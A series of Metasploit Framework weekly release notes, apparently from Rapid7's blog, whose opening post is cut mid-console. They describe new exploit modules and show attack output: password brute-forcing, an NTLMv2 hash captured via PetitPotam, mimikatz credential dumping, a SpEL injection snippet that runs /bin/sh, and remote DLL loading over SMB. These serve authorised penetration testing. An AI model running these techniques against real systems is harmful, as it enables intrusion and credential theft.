[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Sending stage (186438 bytes) to 192.168.159.17
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.17:54960) at 2023-03-17 13:20:03 -0400
meterpreter >

The auxiliary/scanner/amqp/amqp_version module displays the version information about Advanced Message Queuing Protocol (AMQP) 0-9-1 servers:

msf6 > use auxiliary/scanner/amqp/amqp_version
msf6 auxiliary(scanner/amqp/amqp_version) > set RHOSTS 192.168.159.0/24
RHOSTS => 192.168.159.0/24
msf6 auxiliary(scanner/amqp/amqp_version) > run
[*] 192.168.159.17:5671 - AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PLAIN)
[*] 192.168.159.0/24:5671 - Scanned  51 of 256 hosts (19% complete)
[*] 192.168.159.0/24:5671 - Scanned  53 of 256 hosts (20% complete)
[*] 192.168.159.0/24:5671 - Scanned  98 of 256 hosts (38% complete)
[*] 192.168.159.128:5671 - AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
[*] 192.168.159.0/24:5671 - Scanned 104 of 256 hosts (40% complete)
[*] 192.168.159.0/24:5671 - Scanned 150 of 256 hosts (58% complete)
[*] 192.168.159.0/24:5671 - Scanned 154 of 256 hosts (60% complete)
[*] 192.168.159.0/24:5671 - Scanned 199 of 256 hosts (77% complete)
[*] 192.168.159.0/24:5671 - Scanned 216 of 256 hosts (84% complete)
[*] 192.168.159.0/24:5671 - Scanned 233 of 256 hosts (91% complete)
[*] 192.168.159.0/24:5671 - Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_version) > services 
Services
========
host             port  proto  name   state  info
----             ----  -----  ----   -----  ----
192.168.159.17   5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.8.16) (cluster:rabbit@WIN-KHPRSGSRF30) (platform:Erlang/OTP 23.3) (authentication:AMQPLAIN, PL
                                            AIN)
192.168.159.128  5671  tcp    amqps  open   AMQP Detected (version:RabbitMQ 3.11.10) (cluster:rabbit@my-rabbit) (platform:Erlang/OTP 25.3) (authentication:PLAIN, AMQPLAIN)
msf6 auxiliary(scanner/amqp/amqp_version) 

The new auxiliary/scanner/amqp/amqp_login module can be used to bruteforce service credentials:

msf6 > use auxiliary/scanner/amqp/amqp_login 
msf6 auxiliary(scanner/amqp/amqp_login) > set RHOSTS 192.168.159.128
RHOSTS => 192.168.159.128
msf6 auxiliary(scanner/amqp/amqp_login) > set USERNAME admin
USERNAME => admin
msf6 auxiliary(scanner/amqp/amqp_login) > set PASS_FILE data/wordlists/unix_passwords.txt
PASS_FILE => data/wordlists/unix_passwords.txt
msf6 auxiliary(scanner/amqp/amqp_login) > set RPORT 5672
RPORT => 5672
msf6 auxiliary(scanner/amqp/amqp_login) > set SSL false
[!] Changing the SSL option's value may require changing RPORT!
SSL => false
msf6 auxiliary(scanner/amqp/amqp_login) > run
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:Password1! (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:admin (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:12345 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[-] 192.168.159.128:5672 - LOGIN FAILED: admin:123456789 (Incorrect: ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.)
[+] 192.168.159.128:5672 - Login Successful: admin:password
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/amqp/amqp_login) > 

New module content (5)

AMQP 0-9-1 Login Check Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17828 contributed by zeroSteiner

Description: This adds a login scanner module for AMQP services

AMQP 0-9-1 Version Scanner

Author: Spencer McIntyre
Type: Auxiliary
Pull request: #17827 contributed by zeroSteiner

Description: This adds a scanner module that extracts version information from AMQP protocol servers.

Optergy Proton and Enterprise BMS Command Injection using a backdoor

Authors: Gjoko Krstic and h00die-gr3y
Type: Exploit
Pull request: #17806 contributed by h00die-gr3y
AttackerKB reference: CVE-2019-7276

Description: This module exploits an undocumented backdoor vulnerability in the Optergy Proton and Enterprise Building Management System (BMS) applications.

Ancillary Function Driver (AFD) for WinSock Elevation of Privilege

Authors: Christophe De La Fuente, Yarden Shafir, b33f, and chompie
Type: Exploit
Pull request: #17826 contributed by cdelafuente-r7
AttackerKB reference: CVE-2023-21768

Description: This PR adds an exploit module for CVE-2023-21768 that achieves local privilege escalation on Windows 11 2H22.

SolarWinds Information Service (SWIS) .NET Deserialization From AMQP RCE

Authors: Justin Hong, Lucas Miller, Piotr Bazydło, and Spencer McIntyre
Type: Exploit
Pull request: #17785 contributed by zeroSteiner
AttackerKB reference: CVE-2022-38108

Description: This adds an exploit for an authenticated .NET deserialization vulnerability that affects the SolarWinds Information Service (SWIS) component within SolarWinds. The SWIS component will deserialize messages received by the AMQP message queue, resulting in command execution as NT AUTHORITY\SYSTEM.

Enhancements and features (6)

• #17724 from dwelch-r7 – Updates the modules/auxiliary/admin/kerberos/forge_ticket.rb module with a new IncludeTicketChecksum option. When set to true the forged PAC will include the PAC_TICKET_CHECKSUM required in newer Windows AD implementations
• #17753 from adfoster-r7 – Updates the auxiliary/admin/kerberos/get_ticket module to support using forged golden tickets. Users can now provide the Krb5Ccname option to supply the Kerberos TGT to use when requesting the service ticket. If unset, the database will be checked for a valid TGT as normal
• #17789 from bcoles – This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17789 from bcoles – This PR add enhancements to the proftpd_modcopy_exec module. Enhancements include documentation, notes, a reference URL, and a few general code improvements to the check and exploit methods.
• #17813 from samueloph – This sets the CHECK_FALSE option to true by default so that the scanner will bail upon detecting false positive results.
• #17833 from adfoster-r7 – Updates the Metasploit RPC module.info command response to include whether or not the module supports a check method

Bugs fixed (6)

• #17704 from ide0x90 – Fixes a crash in multi/http/solr_velocity_rce that was discovered when targeting a machine running Apache Solr 8.3.0 on Linux that required authentication.
• #17808 from adfoster-r7 – Updates multiple broken Secunia references in modules with equivalent links found within Wayback Machine – a digital archive of the world wide web founded by the Internet Archive.
• #17818 from adfoster-r7 – This PR fixes a crash in the RPC job info command.
• #17825 from dm-ct – Fixes broken documentation references in the exploits/linux/local/zimbra_slapper_priv_esc module
• #17830 from bcoles – Fixes a crash when parsing dates in ./tools/modules/committer_count.rb
• #17831 from dm-ct – Fixes broken documentation references in the exploits/aix/rpc_cmsd_opcode21.rb module

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.3.9…6.3.10
• Full diff 6.3.9…6.3.10

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/11/11/metasploit-weekly-wrap-up-183/

ADCS – ESC Vulnerable certificate template finder

Our very own Grant Willcox has developed a new module which allows users to query a LDAP server for vulnerable Active Directory Certificate Services (AD CS) certificate templates. The module will print the detected certificate details, and the attack it is susceptible to. This module is capable of checking for ESC1, ESC2, and ESC3 vulnerable certificates.

Example module output showing an identified vulnerable certificate template:

msf6 auxiliary(gather/ldap_esc_vulnerable_cert_finder) > run
[*] Running module against 172.26.104.157
[*] Discovering base DN automatically
[+] 172.26.104.157:389 Discovered base DN: DC=daforest,DC=com
[*] Template: SubCA
[*]    Distinguished Name: CN=SubCA,CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration,DC=daforest,DC=com
[*]    Vulnerable to: ESC1, ESC2, ESC3_TEMPLATE_2
[*]    Certificate Template Enrollment SIDs:
[*]       * S-1-5-21-3290009963-1772292745-3260174523-512 (Domain Admins)
[*]       * S-1-5-21-3290009963-1772292745-3260174523-519 (Enterprise Admins)
[*]    Issuing CAs:
[*]       * daforest-WIN-BR0CCBA815B-CA
[*]          Server: WIN-BR0CCBA815B.daforest.com
[*]          Enrollment SIDs:
[*]             * S-1-5-11 (Authenticated Users)
… etc etc …

SSL Scanner improvements

Community member h00die has made improvements to a new Metasploit’s SSL scanner modules, and combined the functionality of two existing modules auxiliary/scanner/http/ssl.rb auxiliary/scanner/http/ssl_version.rb into one new module auxiliary/scanner/ssl/ssl_version.rb. This new module has added checks for Deprecated protocols, expired/not valid certs, low key strength, Null cipher suites, certificates signed with MD5, DROWN, RC4 ciphers, exportable ciphers, LOGJAM, and BEAST.

Reduced Python payload sizes

Community member llamasoft has recently contributed improvements to our Python payloads, with the first change being a modification to the Python Meterpreter stage to calculate the necessary data for AES encryption at runtime – which helped reduce the stage size by about 6,000 bytes. This week’s Metasploit release includes compression support using zlib. This change reduces the size of the Python Meterpreter from 95kb to 24kb.

New module content (4)

• Misconfigured Certificate Template Finder by Grant Willcox – This adds a module that analyzes certificate templates to identify ones that are vulnerable to ESC1, ESC2 and ESC3. When a template is found to be vulnerable, the necessary information is printed for the user including the template name, the issuing CAs and the SIDs of the users that are able to issue them.
• SSL/TLS Version Detection by todb, Chris John Riley, Veit Hailperin, et, and h00die, which detects CVE-2022-3358 – A new module modules/auxiliary/scanner/ssl/ssl_version.rb has been released which replaces the old SSL scanners and offers improved features such as SSL cipher suite checking, improvements to CA Issuers logic, support for expired certs and depreciated protocols, and better error handling.
• Reverse Lookup IP Addresses by mubix and bcoles – Adds a new post/multi/recon/reverse_lookup module that reverse resolves an IP address or IP address range to hostnames. The old post/windows/gather/reverse_lookup and post/windows/recon/resolve_ip modules have been removed.
• Windows Gather Navicat Passwords by HyperSine and Kali-Team – This adds a post module that retrieves and decrypts passwords saved by Navicat.

Enhancements and features (6)

• #17211 from llamasoft – This compresses Python payloads using zlib to make them smaller.
• #17219 from jheysel-r7 – Update Zabbix login_scanner to work with version 6.2.4.
• #17223 from cgranleese-r7 – The reload_lib functionality has been updated so that its file change tracking logic better takes into account scenarios where files are modified. Previously if a breakpoint was inserted, removed, and then reload_lib -a was run, it would mistakenly use an old copy of the code.
• #17234 from cgranleese-r7 – Add references to info -d command in the options and info command outputs. This command allows you to generate a HTML document which you can use to view the full documentation of a module in your browser.
• #17235 from jmartin-r7 – Updates auxiliary/scanner/http/manageengine_desktop_central_login module to report the service name correctly as http or https.
• #17238 from zeroSteiner and NtAlexio2 – Adds the shutdown command to Window’s Python Meterpreter.

Bugs fixed (3)

• #17177 from nzdjb – A bug has been fixed when searching for or attempting to use modules whereby trailing :‘s were not handled appropriately as part of the input, and could lead to all modules in Metasploit being returned.
• #17221 from adfoster-r7 -A bug has been fixed that would cause crashes when generating payload sizes. Additionally, the code has been updated to ignore payload metadata for adaptor payloads when determining payload sizes.
• #17244 from zeroSteiner – A bug that could cause the hostname command to fail in Mettle versions of Meterpreter has been improved by adding increased validation to the hostname code.
• #17220 from adfoster-r7 – This fixes a crash in the peinject stage that would occur when the PE datastore option was not set.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.25…6.2.26
• Full diff 6.2.25…6.2.26

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/08/19/metasploit-wrap-up-172/

Advantech iView NetworkServlet Command Injection

This week Shelby Pace has developed a new exploit module for CVE-2022-2143. This module uses an unauthenticated command injection vulnerability to gain remote code execution against vulnerable versions of Advantech iView software below 5.7.04.6469. The software runs as NT AUTHORITY\SYSTEM, granting the module user unauthenticated privileged access with relatively low effort. Version 5.7.04.6469 has been patched to require authentication, but remote code execution can still be achieved – gaining a shell as the LOCAL SERVICE user.

Cisco ASA ASDM Brute-force Login

Our very own Jake Baines has contributed a new module which scans for the Cisco ASA ASDM landing page and performs login brute-force to identify valid credentials:

msf6 > use auxiliary/scanner/http/cisco_asa_asdm_bruteforce
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set RHOST 10.9.49.201
RHOST => 10.9.49.201
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > set VERBOSE false
VERBOSE => false
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > run
[*] The remote target appears to host Cisco ASA ASDM. The module will continue.
[*] Starting login brute force...
[+] SUCCESSFUL LOGIN - "cisco":"cisco123"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/cisco_asa_asdm_bruteforce) > 

New module content (2)

• Cisco ASA ASDM Brute-force Login by jbaines-r7 – This adds a scanner module to brute force the Cisco ASA’s ASDM interface in its default configuration.
• Advantech iView NetworkServlet Command Injection by Shelby Pace, rgod, and y4er, which exploits CVE-2022-2143 – This adds an exploit module that leverages a command injection vulnerability in Advantech iView (CVE-2022-2143) to get remote command execution as the SYSTEM user. Versions below 5.7.04.6469 are vulnerable and do not require authentication. Version 5.7.04.6469 is still vulnerable but requires valid credentials to be exploited. Also, this version only gets you RCE as the LOCAL SERVICE user.

Enhancements and features (7)

• #16883 from gwillcox-r7 -This PR deprecates the srt_webdrive_priv script as the same functionality is included in the service_permissions post module.
• #16884 from bcoles – This PR deprecates the credcollect script as it has effectively been replaced by post/windows/gather/credentials/credential_collector
• #16902 from bcoles – The scripts/meterpreter/killav.rb script has been removed since scripts have been depreciated for over 5 years. It has been replaced with post/windows/manage/killav.
• #16905 from bcoles – The scripts/meterpreter/panda_2007_pavsrv51.rb script has been removed and replaced by exploit/windows/local/service_permissions. Note that scripts have been deprecated for over 5 years and are no longer supported.
• #16908 from bcoles – Remove ./scripts/meterpreter/dumplinks.rb, replace with post/windows/gather/dumplink which does pretty much the same thing but is a proper module vs a deprecated script, since we stopped supporting scripts several years ago.
• #16909 from bcoles – scripts/meterpreter/get_pidgin_creds.rb has been removed since scripts have been depreciated for some time now and are no longer supported. It has been replaced by post/multi/gather/pidgin_cred.
• #16910 from bcoles – The scripts/meterpreter/arp_scanner.rb script has been replaced with post/windows/gather/arp_scanner which implements the same logic with an improved OUI database to help fingerprint the MAC vendor.

Bugs fixed (1)

• #16881 from bcoles – This fixes a crash in the post/windows/manage/forward_pageant module caused by the removal of Dir::Tmpname.make_tmpname() in Ruby 2.5.0. This also makes some improvements to the code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.2.12…6.2.13
• Full diff 6.2.12…6.2.13

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/27/metasploit-weekly-wrap-up-158-2/

PetitPotam Improvements

Metasploit’s Ruby support has been updated to allow anonymous authentication to SMB servers. This is notably useful while exploiting the PetitPotam vulnerability with Metasploit, which can be used to coerce a Domain Controller to send an authentication attempt over SMB to other machines via MS-EFSRPC methods:

msf6 auxiliary(scanner/dcerpc/petitpotam) > run 192.168.159.10

[*] 192.168.159.10:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.10[\lsarpc] ...
[*] 192.168.159.10:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw

[+] Received SMB connection on Auth Capture Server!
[SMB] NTLMv2-SSP Client     : 192.168.159.10
[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:768ec6a80487d57b:c5bae280991f0814f92bbbd5cce710df:0101000000000000806cc79fb364d801fed140b07186c36f000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f005500500007000800806cc79fb364d80106000400020000000800300030000000000000000000000000400000ee85f088ff3d462c936ca209ddc2cc835a9df7261cf96264158f81bf31035a980a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000

[+] 192.168.159.10:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
[*] 192.168.159.10:445    - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/dcerpc/petitpotam) >

Full details can be found in the Metasploit PetitPotam documentation.

Standalone SMB Server tool

Our very own Spencer McIntyre has added support for creating a new standalone tool for spawning an SMB server that allows read-only access to the current working directory. This new SMB server functionality supports SMB 1/2/3, as well as encryption support for SMB3.

Example usage:

ruby tools/smb_file_server.rb --share-name home --username metasploit --password password --share-point .

This can be useful for copying files onto remote targets, or running remote DLLs:

copy \\192.168.123.1\home\example.txt .

rundll32.exe \\192.168.123.1\home\example.dll,0

Local Exploit suggester improvements

The post/multi/recon/local_exploit_suggester module is a post-exploitation module which iterates through multiple relevant Metasploit modules and automatically checks for local vulnerabilities that may lead to privilege escalation.

This module has been updated with a number of bug fixes, as well as having the UX has been improved to more clearly highlight which modules are viable:

msf6 post(multi/recon/local_exploit_suggester) > run session=-1
... etc ...
[*] ::1 - Valid modules for session 3:
============================
 #   Name                                                                Potentially Vulnerable?  Check Result
 -   ----                                                                -----------------------  ------------
 1   exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec                 Yes                      The target is vulnerable.
 2   exploit/linux/local/cve_2022_0847_dirtypipe                         Yes                      The target appears to be vulnerable. Linux kernel version found: 5.14.0
 3   exploit/linux/local/cve_2022_0995_watch_queue                       Yes                      The target appears to be vulnerable.
 4   exploit/linux/local/desktop_privilege_escalation                    Yes                      The target is vulnerable.
 5   exploit/linux/local/network_manager_vpnc_username_priv_esc          Yes                      The service is running, but could not be validated.
 6   exploit/linux/local/pkexec                                          Yes                      The service is running, but could not be validated.
 7   exploit/linux/local/polkit_dbus_auth_bypass                         Yes                      The service is running, but could not be validated. Detected polkit framework version 0.105.
 8   exploit/linux/local/su_login                                        Yes                      The target appears to be vulnerable.
 9   exploit/android/local/futex_requeue                                 No                       The check raised an exception.
 10  exploit/linux/local/abrt_raceabrt_priv_esc                          No                       The target is not exploitable.
 11  exploit/linux/local/abrt_sosreport_priv_esc                         No                       The target is not exploitable.
 12  exploit/linux/local/af_packet_chocobo_root_priv_esc                 No                       The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable
 13  exploit/linux/local/af_packet_packet_set_ring_priv_esc              No                       The target is not exploitable.
 14  exploit/linux/local/apport_abrt_chroot_priv_esc                     No                       The target is not exploitable.
 15  exploit/linux/local/asan_suid_executable_priv_esc                   No                       The check raised an exception.
 16  exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc          No                       The target is not exploitable.

Setting the option verbose=true will now also highlight modules that weren’t considered as part of the module suggestion phase – due to session platform/arch/type mismatches. This is useful for evaluating modules which may require manually migrating from a Shell session to Meterpreter, or from a Python Meterpreter to a Native Meterpreter to gain local privilege escalation etc.

New module content (1)

• #16488 from cdelafuente-r7 – This updates the exploit/windows/local/vss_persistence and post/windows/manage/persistence_exe modules to optionally obfuscate scheduled tasks. Additionally, the post/windows/manage/persistence_exe was updated with a new "TASK" startup technique that allows users to obtain persistence via a scheduled task.

Enhancements and features (7)

• #16413 from sjanusz-r7 – Updates the multi/recon/local_exploit_suggester with multiple enhancements, including the ability to correctly work with Java/Python Meterpreters as well as now generating a readable table of results.
• #16481 from zeroSteiner – This updates the Msf::Exploit::Remote::SMB::Server::Share mixin to use RubySMB, which now supports SMB versions 1-3, along with various other features like accounting, state logging, session tracking, support for multiple files etc. All existing modules that were using this mixin will now automatically benefit from these improvements. They will work again against modern versions of Windows where SMBv1 has been disabled.
• #16518 from adfoster-r7 – Merge Metasploit framework wiki into Metasploit framework.
• #16600 from adfoster-r7 – Update docs site to use migrated wiki files.
• #16610 from zeroSteiner – Updates the module windows/dcerpc/cve_2021_1675_printnightmare from being an auxiliary that would require the user to setup and configure an external Samba share to host the payload to an all-inclusive exploit. This means users can deliver their payloads in a seamless fashion without needing to deal with Samba.
• #16620 from zeroSteiner – Adds a standalone tool for creating a read-only SMB 2/3 server from the current working directory. Usage: ruby ./tools/smb_file_server.rb. Normal SMB clients can then connect to this share and download files as normal. For instance via Windows with copy \\192.168.123.1\home\example.exe . or net use \\192.168.123.1\home /u:WORKGROUP\metasploit password

Bugs fixed (1)

• #16619 from NikitaKovaljov – This fixes a bug in neighbor advertisement filtering as used by the auxiliary/scanner/discover/ipv6_neighbor module. Prior to this patch, the module would fail to map IPv4 to IPv6 addresses.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.43…6.2.0
• Full diff 6.1.43…6.2.0

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/

VMware Workspace ONE Access RCE

Community contributor wvu has developed a new Metasploit Module which exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the ‘horizon’ user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official Rapid7 Analysis

WSO2 Arbitrary File Upload to RCE

Our very own Jack Hysel has contributed a new module for CVE-2022-29464. Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a java/meterpreter/reverse_tcp payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official Rapid7 Analysis

Kiwi Meterpreter Updates – Windows 11 Support

The Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream mimikatz project. Notably this adds support for Windows 11 when running the creds_all command within a Meterpreter console:

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > load kiwi
Loading extension kiwi…
  .#####.   mimikatz 2.2.0 20191125 (x64/windows)
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'        Vincent LE TOUX            ( [email protected] )
  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/
Success.
meterpreter > sysinfo
Computer        : WIN11-TEST
OS              : Windows 10 (10.0 Build 22000).
Architecture    : x64
System Language : en_US
Domain          : TESTINGDOMAIN
Logged On Users : 11
Meterpreter     : x64/windows
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username     Domain         NTLM                           SHA1
--------     ------         ----                           ----
WIN11-TEST$  TESTINGDOMAIN  a133becebb8e22321dbf26bf8d90f398  dbf0ad587f62004306f435903fb3a516da6ba104
... etc etc ...

New module content (3)

• VMware Workspace ONE Access CVE-2022-22954 by wvu, Udhaya Prakash, and mr_me, which exploits CVE-2022-22954 – This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.
• WSO2 Arbitrary File Upload to RCE by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits CVE-2022-29464 – This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.
• ZoneMinder Language Settings Remote Code Execution by krastanoel, which exploits CVE-2022-29806 – This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the www-data user.

Enhancements and features (2)

• #16445 from dwelch-r7 – The Windows Meterpreter payload now supports a MeterpreterDebugLogging datastore option for logging debug information to a file. Example usage:

use windows/x64/meterpreter_reverse_tcp
set MeterpreterDebugBuild true
set MeterpreterDebugLogging rpath:C:/test/foo.txt
save
generate -f exe -o shell.exe
to_handler

• #16462 from bcoles – Adds support for armle/aarch64 architectures to gdb_server_exec

Bugs fixed (2)

• #16526 from jheysel-r7 – The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.
• #16530 from sjanusz-r7 – This updates the pihole_remove_commands_lpe module to no longer break sessions when running the check method.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.40…6.1.41
• Full diff 6.1.40…6.1.41

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/04/01/metasploit-weekly-wrap-up-155/

CVE-2022-22963 – Spring Cloud Function SpEL RCE

A new exploit/multi/http/spring_cloud_function_spel_injection module has been developed by our very own Spencer McIntyre which targets Spring Cloud Function versions Prior to 3.1.7 and 3.2.3. This module is unrelated to Spring4Shell CVE-2022-22965, which is a separate vulnerability in the WebDataBinder component of Spring Framework.

This exploit works by crafting an unauthenticated HTTP request to the target application. When the spring.cloud.function.routing-expression HTTP header is received by the server it will evaluate the user provided SpEL (Spring Expression Language) query, leading to remote code execution. This can be seen within the CVE-2022-22963 Metasploit module:

res = send_request_cgi(
    'method' => 'POST',
    'uri' => normalize_uri(datastore['TARGETURI']),
    'headers' => {
    'spring.cloud.function.routing-expression' => "T(java.lang.Runtime).getRuntime().exec(new String[]{'/bin/sh','-c','#{cmd.gsub("'", "''")}'})"
    }
)

Both patched and unpatched servers will respond with a 500 server error and a JSON encoded message

New module content (1)

• Spring Cloud Function SpEL Injection by Spencer McIntyre, hktalent, and m09u3r, which exploits CVE-2022-22963 – This achieves unauthenticated remote code execution by executing SpEL (Spring Expression Language) queries against Spring Cloud Function versions prior to 3.1.7 and 3.2.3.

Bugs fixed (2)

• #16364 from zeroSteiner – This adds a fix for a crash in auxiliary/spoof/dns/native_spoofer and adds documentation for the module.
• #16386 from adfoster-r7 – Fixes a crash when running the exploit/multi/misc/java_rmi_server module against at target server, such as Metasploitable2

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

• Pull Requests 6.1.35…6.1.36
• Full diff 6.1.35…6.1.36

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2022/03/18/metasploit-weekly-wrap-up-153/

CVE-2022-21999 – SpoolFool

Our very own Shelby Pace has added a new module for the CVE-2022-21999 SpoolFool privilege escalation vulnerability. This escalation vulnerability can be leveraged to achieve code execution as SYSTEM. This new module has successfully been tested on Windows 10 (10.0 Build 19044) and Windows Server 2019 v1809 (Build 17763.1577).

CVE-2021-4191 – Gitlab GraphQL API User Enumeration

Jake Baines has contributed a new module for CVE-2021-4191, which queries the GitLab GraphQL API to acquire the list of GitLab users without authentication. There’s some news coverage from earlier this month here. The module works on all GitLab versions from 13.0 up to 14.8.2, 14.7.4, and 14.6.5.

Adapted Payloads

Spencer McIntyre has added a new payload type that allows existing modules to be adapted for new scenarios. For example, modern exploits often deliver OS command payloads while Metasploit users would prefer to have more fully-featured native payloads (like Meterpreter delivered) and these scenarios are often special cases handled by the module author. Metasploit’s new payload adapters allow payloads from one architecture to be converted to another for seamless compatibility with a wider variety of exploit modules. The first entry for this new type is an adapter that converts Python payloads to OS command payloads, allowing any exploit capable of executing a Unix Command payload to deliver a Python Metepreter in memory. For additional ease of use, the correct Python binary is automatically determined.

New module content (3)

• Windows IIS HTTP Protocol Stack DOS by Axel Souchet, Maurice LAMBERT, Max, and Stefan Blair, which exploits CVE-2021-31166 – A new module has been added that exploits CVE-2021-31166, a UAF bug in http.sys when parsing Accept-Encoding headers, to cause a BSoD and denial of service on vulnerable IIS servers.
• GitLab GraphQL API User Enumeration by jbaines-r7 and mungsul, which exploits CVE-2021-4191 – This adds an auxiliary module that enumerates Gitlab user accounts via the GraphQL API which does not require authentication when querying user information.
• CVE-2022-21999 SpoolFool Privesc by Oliver Lyak and Shelby Pace, which exploits CVE-2022-21999 – This adds a module targeting SpoolFool (AKA CVE-2022-21999), a local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.

Enhancements and features (2)

• #16186 from zeroSteiner – This adds an additional Adapter payload type which can be used in a scenario such as wanting to deliver a full Meterpreter session from a command payload.
• #16262 from zeroSteiner – This updates the default payload selection so that cmd/unix/reverse_bash is chosen over cmd/unix/reverse_netcat by default unless RequiredCmd is set such that the module cannot execute Bash payloads.

Bugs fixed (7)

• #16316 from smashery – This ensures individual modules no longer accidentally shut down joint services that are used across multiple modules/handlers etc, such as HTTP servers. Modules will now correctly unregister interest in the global service, and if there are no longer any interested modules in the running global service, it will be shut down correctly.
• #16324 from smashery – This fixes an issue in the DNS native server module where the server would crash upon receiving a query.
